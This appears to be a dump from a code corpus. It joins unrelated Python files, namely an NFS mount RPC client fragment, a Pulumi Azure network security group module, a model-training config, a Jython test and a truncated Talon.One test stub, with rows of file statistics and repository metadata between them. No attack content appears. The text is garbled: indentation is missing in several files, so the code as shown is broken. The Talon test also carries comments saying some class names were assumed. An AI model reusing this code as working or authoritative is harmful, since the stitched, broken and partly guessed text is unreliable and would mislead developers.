def MOUNTPROC3_NULL(self):
procedure_id = 0
self.call(procedure_id, '')
return None
# mountres3 MOUNTPROC3_MNT(dirpath3)
def MOUNTPROC3_MNT(self, p0):
procedure_id = 1
packer = pack.protPacker()
packer.pack_dirpath3(p0)
res = self.call(procedure_id, packer.get_buffer())
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_mountres3()
unpacker.done()
return res
# mountopt3 MOUNTPROC3_DUMP(void)
def MOUNTPROC3_DUMP(self):
procedure_id = 2
res = self.call(procedure_id, '')
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_mountopt3()
unpacker.done()
return res
# void MOUNTPROC3_UMNT(dirpath3)
def MOUNTPROC3_UMNT(self, p0):
procedure_id = 3
packer = pack.protPacker()
packer.pack_dirpath3(p0)
self.call(procedure_id, packer.get_buffer())
return None
# void MOUNTPROC3_UMNTALL(void)
def MOUNTPROC3_UMNTALL(self):
procedure_id = 4
self.call(procedure_id, '')
return None
# exportsopt3 MOUNTPROC3_EXPORT(void)
def MOUNTPROC3_EXPORT(self):
procedure_id = 5
res = self.call(procedure_id, '')
unpacker = pack.protUnpacker(res)
res = unpacker.unpack_exportsopt3()
unpacker.done()
return res
def __getitem__(self, key):
d = {
const.RawTCPMOUNT_V3 : 'RawTCPMOUNT_V3',
const.TCPMOUNT_V3 : 'TCPMOUNT_V3',
const.RawUDPMOUNT_V3 : 'RawUDPMOUNT_V3',
const.UDPMOUNT_V3 : 'UDPMOUNT_V3'
}
return getattr(self, d[key])
MOUNT_PROGRAM = MOUNT_PROGRAM()
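# Illustrative sketch (assumption): a minimal mount handshake. Host and export
# path are placeholders, and the mountres3 field names (fhs_status,
# mountinfo.fhandle) are assumed from RFC 1813; check the pack module for the
# exact attribute names it generates.
def _example_mount(host='filer.example.com', path='/export/home'):
    mnt = MOUNT_PROGRAM[const.TCPMOUNT_V3](host)
    res = mnt.MOUNTPROC3_MNT(path)
    if res.fhs_status == 0:  # MNT3_OK
        root_fh = res.mountinfo.fhandle  # handle for subsequent NFS procedures
    mnt.MOUNTPROC3_UMNT(path)
    return res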
| 36.553191
| 118
| 0.575983
| 4,379
| 44,668
| 5.682119
| 0.038822
| 0.099027
| 0.076521
| 0.085524
| 0.981191
| 0.981191
| 0.979343
| 0.979343
| 0.979343
| 0.979343
| 0
| 0.033559
| 0.3389
| 44,668
| 1,221
| 119
| 36.583129
| 0.809042
| 0.098146
| 0
| 0.966429
| 1
| 0
| 0.010456
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.12411
| false
| 0
| 0.003052
| 0
| 0.253306
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
7dea44f63a645f019d4fb818f87af4ff442cfa09
| 19,826
|
py
|
Python
|
sdk/python/pulumi_azure/network/network_security_group.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 109
|
2018-06-18T00:19:44.000Z
|
2022-02-20T05:32:57.000Z
|
sdk/python/pulumi_azure/network/network_security_group.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 663
|
2018-06-18T21:08:46.000Z
|
2022-03-31T20:10:11.000Z
|
sdk/python/pulumi_azure/network/network_security_group.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 41
|
2018-07-19T22:37:38.000Z
|
2022-03-14T10:56:26.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['NetworkSecurityGroupArgs', 'NetworkSecurityGroup']
@pulumi.input_type
class NetworkSecurityGroupArgs:
def __init__(__self__, *,
resource_group_name: pulumi.Input[str],
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
security_rules: Optional[pulumi.Input[Sequence[pulumi.Input['NetworkSecurityGroupSecurityRuleArgs']]]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
The set of arguments for constructing a NetworkSecurityGroup resource.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the network security group. Changing this forces a new resource to be created.
:param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: Specifies the name of the network security group. Changing this forces a new resource to be created.
:param pulumi.Input[Sequence[pulumi.Input['NetworkSecurityGroupSecurityRuleArgs']]] security_rules: A list of objects representing security rules, as defined below.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
pulumi.set(__self__, "resource_group_name", resource_group_name)
if location is not None:
pulumi.set(__self__, "location", location)
if name is not None:
pulumi.set(__self__, "name", name)
if security_rules is not None:
pulumi.set(__self__, "security_rules", security_rules)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the resource group in which to create the network security group. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the name of the network security group. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="securityRules")
def security_rules(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['NetworkSecurityGroupSecurityRuleArgs']]]]:
"""
A list of objects representing security rules, as defined below.
"""
return pulumi.get(self, "security_rules")
@security_rules.setter
def security_rules(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['NetworkSecurityGroupSecurityRuleArgs']]]]):
pulumi.set(self, "security_rules", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@pulumi.input_type
class _NetworkSecurityGroupState:
def __init__(__self__, *,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
security_rules: Optional[pulumi.Input[Sequence[pulumi.Input['NetworkSecurityGroupSecurityRuleArgs']]]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
Input properties used for looking up and filtering NetworkSecurityGroup resources.
:param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: Specifies the name of the network security group. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the network security group. Changing this forces a new resource to be created.
:param pulumi.Input[Sequence[pulumi.Input['NetworkSecurityGroupSecurityRuleArgs']]] security_rules: A list of objects representing security rules, as defined below.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
if location is not None:
pulumi.set(__self__, "location", location)
if name is not None:
pulumi.set(__self__, "name", name)
if resource_group_name is not None:
pulumi.set(__self__, "resource_group_name", resource_group_name)
if security_rules is not None:
pulumi.set(__self__, "security_rules", security_rules)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the name of the network security group. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the resource group in which to create the network security group. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="securityRules")
def security_rules(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['NetworkSecurityGroupSecurityRuleArgs']]]]:
"""
A list of objects representing security rules, as defined below.
"""
return pulumi.get(self, "security_rules")
@security_rules.setter
def security_rules(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['NetworkSecurityGroupSecurityRuleArgs']]]]):
pulumi.set(self, "security_rules", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
class NetworkSecurityGroup(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
security_rules: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['NetworkSecurityGroupSecurityRuleArgs']]]]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None):
"""
Manages a network security group that contains a list of network security rules. Network security groups control whether inbound or outbound traffic is allowed or denied.
> **NOTE on Network Security Groups and Network Security Rules:** This provider currently
provides both a standalone Network Security Rule resource, and allows for Network Security Rules to be defined in-line within the Network Security Group resource.
At this time you cannot use a Network Security Group with in-line Network Security Rules in conjunction with any Network Security Rule resources. Doing so will cause a conflict of rule settings and will overwrite rules.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_network_security_group = azure.network.NetworkSecurityGroup("exampleNetworkSecurityGroup",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
security_rules=[azure.network.NetworkSecurityGroupSecurityRuleArgs(
name="test123",
priority=100,
direction="Inbound",
access="Allow",
protocol="Tcp",
source_port_range="*",
destination_port_range="*",
source_address_prefix="*",
destination_address_prefix="*",
)],
tags={
"environment": "Production",
})
```
## Import
Network Security Groups can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:network/networkSecurityGroup:NetworkSecurityGroup group1 /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/mygroup1/providers/Microsoft.Network/networkSecurityGroups/mySecurityGroup
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: Specifies the name of the network security group. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the network security group. Changing this forces a new resource to be created.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['NetworkSecurityGroupSecurityRuleArgs']]]] security_rules: A list of objects representing security rules, as defined below.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: NetworkSecurityGroupArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages a network security group that contains a list of network security rules. Network security groups control whether inbound or outbound traffic is allowed or denied.
> **NOTE on Network Security Groups and Network Security Rules:** This provider currently
provides both a standalone Network Security Rule resource, and allows for Network Security Rules to be defined in-line within the Network Security Group resource.
At this time you cannot use a Network Security Group with in-line Network Security Rules in conjunction with any Network Security Rule resources. Doing so will cause a conflict of rule settings and will overwrite rules.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_network_security_group = azure.network.NetworkSecurityGroup("exampleNetworkSecurityGroup",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
security_rules=[azure.network.NetworkSecurityGroupSecurityRuleArgs(
name="test123",
priority=100,
direction="Inbound",
access="Allow",
protocol="Tcp",
source_port_range="*",
destination_port_range="*",
source_address_prefix="*",
destination_address_prefix="*",
)],
tags={
"environment": "Production",
})
```
## Import
Network Security Groups can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:network/networkSecurityGroup:NetworkSecurityGroup group1 /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/mygroup1/providers/Microsoft.Network/networkSecurityGroups/mySecurityGroup
```
:param str resource_name: The name of the resource.
:param NetworkSecurityGroupArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(NetworkSecurityGroupArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
security_rules: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['NetworkSecurityGroupSecurityRuleArgs']]]]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = NetworkSecurityGroupArgs.__new__(NetworkSecurityGroupArgs)
__props__.__dict__["location"] = location
__props__.__dict__["name"] = name
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["security_rules"] = security_rules
__props__.__dict__["tags"] = tags
super(NetworkSecurityGroup, __self__).__init__(
'azure:network/networkSecurityGroup:NetworkSecurityGroup',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
security_rules: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['NetworkSecurityGroupSecurityRuleArgs']]]]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None) -> 'NetworkSecurityGroup':
"""
Get an existing NetworkSecurityGroup resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: Specifies the name of the network security group. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the network security group. Changing this forces a new resource to be created.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['NetworkSecurityGroupSecurityRuleArgs']]]] security_rules: A list of objects representing security rules, as defined below.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _NetworkSecurityGroupState.__new__(_NetworkSecurityGroupState)
__props__.__dict__["location"] = location
__props__.__dict__["name"] = name
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["security_rules"] = security_rules
__props__.__dict__["tags"] = tags
return NetworkSecurityGroup(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def location(self) -> pulumi.Output[str]:
"""
Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Specifies the name of the network security group. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Output[str]:
"""
The name of the resource group in which to create the network security group. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@property
@pulumi.getter(name="securityRules")
def security_rules(self) -> pulumi.Output[Sequence['outputs.NetworkSecurityGroupSecurityRule']]:
"""
A list of objects representing security rules, as defined below.
"""
return pulumi.get(self, "security_rules")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
| 47.773494
| 229
| 0.666499
| 2,248
| 19,826
| 5.698843
| 0.100089
| 0.081571
| 0.059012
| 0.041215
| 0.846928
| 0.834439
| 0.827492
| 0.817657
| 0.807431
| 0.800952
| 0
| 0.00538
| 0.240593
| 19,826
| 414
| 230
| 47.888889
| 0.84551
| 0.41834
| 0
| 0.731707
| 1
| 0
| 0.117795
| 0.044874
| 0
| 0
| 0
| 0
| 0
| 1
| 0.156098
| false
| 0.004878
| 0.034146
| 0
| 0.282927
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
c4b89e9cb24c513919fd8f676dd769e4e38c37ed
| 2,240
|
py
|
Python
|
Settings/set1-test_of_models_against_datasets/models_30m_640px.py
|
previtus/MGR-Project-Code
|
1126215059eb3f731dcf78ec24d9a480e73abce6
|
[
"MIT"
] | null | null | null |
Settings/set1-test_of_models_against_datasets/models_30m_640px.py
|
previtus/MGR-Project-Code
|
1126215059eb3f731dcf78ec24d9a480e73abce6
|
[
"MIT"
] | null | null | null |
Settings/set1-test_of_models_against_datasets/models_30m_640px.py
|
previtus/MGR-Project-Code
|
1126215059eb3f731dcf78ec24d9a480e73abce6
|
[
"MIT"
] | null | null | null |
def Setup(Settings,DefaultModel):
# set1-test_of_models_against_datasets/models_30m_640px.py
Settings["experiment_name"] = "set1c_Models_Test_30m_640px"
Settings["graph_histories"] = ['together', [0,1], [1,2], [0,2]]
n=0
# 5556x_minlen30_640px 5556x_minlen20_640px 5556x_reslen20_299px 5556x_reslen30_299px
Settings["models"][n]["dataset_name"] = "5556x_minlen30_640px"
Settings["models"][n]["dump_file_override"] = 'SegmentsData_marked_R100_4Tables.dump'
Settings["models"][n]["pixels"] = 640
Settings["models"][n]["model_type"] = 'img_osm_mix'
Settings["models"][n]["unique_id"] = 'mix'
Settings["models"][n]["top_repeat_FC_block"] = 2
Settings["models"][n]["epochs"] = 800
# c
Settings["models"][n]["loss_func"] = 'mean_absolute_error'
Settings["models"][n]["metrics"] = ['mean_squared_error']
Settings["models"].append(DefaultModel.copy())
n=1
Settings["models"][n]["dataset_pointer"] = -1 # 0 - reuse the first dataset
Settings["models"][n]["dataset_name"] = "5556x_minlen30_640px"
Settings["models"][n]["dump_file_override"] = 'SegmentsData_marked_R100_4Tables.dump'
Settings["models"][n]["pixels"] = 640
Settings["models"][n]["model_type"] = 'osm_only'
Settings["models"][n]["unique_id"] = 'osm_only'
Settings["models"][n]["top_repeat_FC_block"] = 2
Settings["models"][n]["epochs"] = 800
# c
Settings["models"][n]["loss_func"] = 'mean_absolute_error'
Settings["models"][n]["metrics"] = ['mean_squared_error']
Settings["models"].append(DefaultModel.copy())
n=2
Settings["models"][n]["dataset_pointer"] = -1 # 0 - reuse the first dataset
Settings["models"][n]["dataset_name"] = "5556x_minlen30_640px"
Settings["models"][n]["dump_file_override"] = 'SegmentsData_marked_R100_4Tables.dump'
Settings["models"][n]["pixels"] = 640
Settings["models"][n]["model_type"] = 'simple_cnn_with_top'
Settings["models"][n]["unique_id"] = 'img_only'
Settings["models"][n]["top_repeat_FC_block"] = 2
Settings["models"][n]["epochs"] = 800
# c
Settings["models"][n]["loss_func"] = 'mean_absolute_error'
Settings["models"][n]["metrics"] = ['mean_squared_error']
return Settings
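# Illustrative sketch (assumption): how a driver script might apply this
# configuration. Setup() mutates Settings["models"][0] in place and appends two
# copies of DefaultModel, so the caller must seed at least one model first.
def _example_apply(Settings, DefaultModel):
    Settings.setdefault("models", [DefaultModel.copy()])  # hypothetical seeding step
    return Setup(Settings, DefaultModel)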
| 41.481481
| 89
| 0.668304
| 287
| 2,240
| 4.923345
| 0.247387
| 0.307148
| 0.307856
| 0.077849
| 0.803963
| 0.748054
| 0.748054
| 0.748054
| 0.748054
| 0.748054
| 0
| 0.062694
| 0.138393
| 2,240
| 53
| 90
| 42.264151
| 0.66943
| 0.090179
| 0
| 0.657895
| 0
| 0
| 0.447291
| 0.06798
| 0
| 0
| 0
| 0
| 0
| 1
| 0.026316
| false
| 0
| 0
| 0
| 0.052632
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
1efad1a35e93faacafc9b02795eac73c00071c63
| 68
|
py
|
Python
|
bugtests/test341c1.py
|
jeff5/jython-whinchat
|
65d8e5268189f8197295ff2d91be3decb1ee0081
|
[
"CNRI-Jython"
] | 577
|
2020-06-04T16:34:44.000Z
|
2022-03-31T11:46:07.000Z
|
bugtests/test341c1.py
|
jeff5/jython-whinchat
|
65d8e5268189f8197295ff2d91be3decb1ee0081
|
[
"CNRI-Jython"
] | 174
|
2015-01-08T20:37:09.000Z
|
2020-06-03T16:48:59.000Z
|
bugtests/test341c1.py
|
jeff5/jython-whinchat
|
65d8e5268189f8197295ff2d91be3decb1ee0081
|
[
"CNRI-Jython"
] | 162
|
2015-02-07T02:14:38.000Z
|
2020-05-30T16:42:03.000Z
|
from test341c2 import test341c2
class bar(test341c2):
pass
| 8.5
| 32
| 0.720588
| 8
| 68
| 6.125
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.230769
| 0.235294
| 68
| 7
| 33
| 9.714286
| 0.711538
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
4805a1942f326fefbec9f682bcb72ec1354e6d81
| 13,365
|
py
|
Python
|
test/test_integration_state.py
|
talon-one/talon_one.py
|
f863bb3c2cc5ddc94d9227adcf14947b2ea7db41
|
[
"MIT"
] | 1
|
2021-03-05T06:41:26.000Z
|
2021-03-05T06:41:26.000Z
|
test/test_integration_state.py
|
talon-one/talon_one.py
|
f863bb3c2cc5ddc94d9227adcf14947b2ea7db41
|
[
"MIT"
] | 1
|
2021-09-07T08:56:58.000Z
|
2021-09-07T08:56:58.000Z
|
test/test_integration_state.py
|
talon-one/talon_one.py
|
f863bb3c2cc5ddc94d9227adcf14947b2ea7db41
|
[
"MIT"
] | 1
|
2019-05-21T10:27:54.000Z
|
2019-05-21T10:27:54.000Z
|
# coding: utf-8
"""
Talon.One API
The Talon.One API is used to manage applications and campaigns, as well as to integrate with your application. The operations in the _Integration API_ section are used to integrate with our platform, while the other operations are used to manage applications and campaigns. ### Where is the API? The API is available at the same hostname as these docs. For example, if you are reading this page at `https://mycompany.talon.one/docs/api/`, the URL for the [updateCustomerProfile][] operation is `https://mycompany.talon.one/v1/customer_profiles/id` [updateCustomerProfile]: #operation--v1-customer_profiles--integrationId--put # noqa: E501
The version of the OpenAPI document: 1.0.0
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import unittest
import datetime
import talon_one
from talon_one.models.integration_state import IntegrationState # noqa: E501
from talon_one.rest import ApiException
class TestIntegrationState(unittest.TestCase):
"""IntegrationState unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def make_instance(self, include_optional):
"""Test IntegrationState
include_optional is a boolean: when False, only required
params are included; when True, both required and
optional params are included. """
# model = talon_one.models.integration_state.IntegrationState() # noqa: E501
if include_optional:
return IntegrationState(
session = talon_one.models.customer_session.CustomerSession(
integration_id = '0',
created = datetime.datetime.strptime('2013-10-20 19:20:30.00', '%Y-%m-%d %H:%M:%S.%f'),
application_id = 56,
profile_id = '0',
coupon = '0',
referral = '0',
state = 'open',
cart_items = [
talon_one.models.cart_item.CartItem(
name = '0',
sku = '0',
quantity = 1,
price = 1.337,
category = '0',
weight = 1.337,
height = 1.337,
width = 1.337,
length = 1.337,
position = 1.337,
attributes = talon_one.models.item_attributes.ItemAttributes(), )  # class name assumed; the generator emitted a garbled identifier here
],
identifiers = [
'0'
],
total = 1.337,
attributes = talon_one.models.attributes.attributes(),
first_session = True,
discounts = {
'key' : 1.337
}, ),
profile = talon_one.models.customer_profile.CustomerProfile(
integration_id = '0',
created = datetime.datetime.strptime('2013-10-20 19:20:30.00', '%Y-%m-%d %H:%M:%S.%f'),
attributes = talon_one.models.attributes.attributes(),
account_id = 56,
closed_sessions = 56,
total_sales = 1.337,
loyalty_memberships = [
talon_one.models.loyalty_membership.LoyaltyMembership(
joined = datetime.datetime.strptime('2013-10-20 19:20:30.00', '%Y-%m-%d %H:%M:%S.%f'),
loyalty_program_id = 56, )
],
audience_memberships = [
talon_one.models.audience_membership.AudienceMembership(
id = 56,
name = '0', )
],
last_activity = datetime.datetime.strptime('2013-10-20 19:20:30.00', '%Y-%m-%d %H:%M:%S.%f'), ),
event = talon_one.models.event.Event(
id = 56,
created = datetime.datetime.strptime('2013-10-20 19:20:30.00', '%Y-%m-%d %H:%M:%S.%f'),
application_id = 56,
profile_id = '0',
type = '0',
attributes = talon_one.models.attributes.attributes(),
session_id = '0',
effects = [
None
],
ledger_entries = [
talon_one.models.ledger_entry.LedgerEntry(
id = 56,
created = datetime.datetime.strptime('2013-10-20 19:20:30.00', '%Y-%m-%d %H:%M:%S.%f'),
profile_id = '0',
account_id = 56,
loyalty_program_id = 56,
event_id = 56,
amount = 56,
reason = '0',
expiry_date = datetime.datetime.strptime('2013-10-20 19:20:30.00', '%Y-%m-%d %H:%M:%S.%f'),
reference_id = 56, )
],
meta = talon_one.models.meta.Meta(
campaigns = talon_one.models.campaigns.campaigns(),
coupons = talon_one.models.coupons.coupons(),
coupon_rejection_reason = talon_one.models.coupon_rejection_reason.CouponRejectionReason(
campaign_id = 56,
coupon_id = 56,
reason = 'CouponNotFound', ),
referral_rejection_reason = talon_one.models.referral_rejection_reason.ReferralRejectionReason(
campaign_id = 56,
referral_id = 56,
reason = 'ReferralNotFound', ),
warnings = talon_one.models.warnings.warnings(), ), ),
loyalty = talon_one.models.loyalty.Loyalty(
programs = {
'key' : talon_one.models.loyalty_program_ledgers.LoyaltyProgramLedgers(
id = 56,
title = '0',
name = '0',
ledger = talon_one.models.loyalty_program_balance.LoyaltyProgramBalance(
current_balance = 1.337,
pending_balance = 1.337,
expired_balance = 1.337,
spent_balance = 1.337,
tentative_current_balance = 1.337, ),
sub_ledgers = {
'key' : talon_one.models.loyalty_program_balance.LoyaltyProgramBalance(
current_balance = 1.337,
pending_balance = 1.337,
expired_balance = 1.337,
spent_balance = 1.337,
tentative_current_balance = 1.337, )
}, )
}, ),
coupon = talon_one.models.coupon.Coupon(
id = 56,
created = datetime.datetime.strptime('2013-10-20 19:20:30.00', '%Y-%m-%d %H:%M:%S.%f'),
campaign_id = 56,
value = '0123',
usage_limit = 0,
discount_limit = 0,
start_date = datetime.datetime.strptime('2013-10-20 19:20:30.00', '%Y-%m-%d %H:%M:%S.%f'),
expiry_date = datetime.datetime.strptime('2013-10-20 19:20:30.00', '%Y-%m-%d %H:%M:%S.%f'),
usage_counter = 56,
discount_counter = 1.337,
discount_remainder = 1.337,
attributes = talon_one.models.attributes_of_coupon.AttributesOfCoupon(),  # class name assumed; original identifier was garbled
referral_id = 56,
recipient_integration_id = '0',
import_id = 56,
reservation = True,
batch_id = '0', )
)
else:
return IntegrationState(
session = talon_one.models.customer_session.CustomerSession(
integration_id = '0',
